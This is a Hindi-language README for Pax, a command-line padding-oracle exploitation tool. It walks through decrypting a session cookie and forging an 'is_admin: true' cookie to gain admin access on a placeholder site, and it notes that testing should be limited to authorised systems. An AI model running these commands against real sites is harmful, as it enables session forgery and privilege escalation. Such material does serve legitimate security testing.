
💀 🔓 PKCS7 padding oracle attacks के लिए CLI उपकरण
पैडिंग ओरेकल का शोषण करें मज़े और लाभ के लिए!
Pax (PAdding oracle eXploiter) एक उपकरण है जो पैडिंग ओरेकल का शोषण करने के लिए है, ताकि:
इसका उपयोग एन्क्रिप्टेड सत्र जानकारी को उजागर करने के लिए किया जा सकता है, और अक्सर प्रमाणीकरण को बायपास करने, विशेषाधिकारों को बढ़ाने और कस्टम सादा पाठ को एन्क्रिप्ट करके इसे सर्वर पर वापस लिखकर दूरस्थ रूप से कोड निष्पादित करने के लिए किया जा सकता है।
हमेशा की तरह, इस उपकरण का उपयोग केवल उन प्रणालियों पर किया जाना चाहिए जिनके आप मालिक हैं और/या जिनकी जांच करने की अनुमति आपके पास है!
रिलीज़ से डाउनलोड करें, या Go के साथ स्थापित करें:
go get -u github.com/liamg/pax/cmd/pax
यदि आपको कोई संदिग्ध ओरेकल मिलता है, जहाँ एन्क्रिप्टेड डेटा SESS नामक कुकी में संग्रहीत है, तो आप निम्नलिखित का उपयोग कर सकते हैं:
pax decrypt --url https://target.site/profile.php --sample Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D --block-size 16 --cookies "SESS=Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D"
यह आशा है कि आपको कुछ सादा पाठ मिलेगा, शायद कुछ इस प्रकार:
{"user_id": 456, "is_admin": false}
ऐसा लगता है कि आप यहाँ अपने विशेषाधिकार बढ़ा सकते हैं!
आप ऐसा करने का प्रयास कर सकते हैं पहले अपना स्वयं का एन्क्रिप्टेड डेटा उत्पन्न करके जिसे ओरेकल किसी चालाक सादा पाठ में डिक्रिप्ट करेगा:
pax encrypt --url https://target.site/profile.php --sample Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D --block-size 16 --cookies "SESS=Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D" --plain-text '{"user_id": 456, "is_admin": true}'
यह एक और base64 एन्कोडेड एन्क्रिप्टेड डेटा का सेट उत्पन्न करेगा, शायद कुछ इस प्रकार:
dGhpcyBpcyBqdXN0IGFuIGV4YW1wbGU=
अब आप अपना ब्राउज़र खोल सकते हैं और SESS कुकी का मान उपरोक्त मान पर सेट कर सकते हैं। मूल ओरेकल पेज को लोड करने पर, आपको अब देखना चाहिए कि आप एडमिन स्तर पर उन्नत हो गए हैं।
यहां इस हमले के बारे में बेहतरीन गाइड हैं: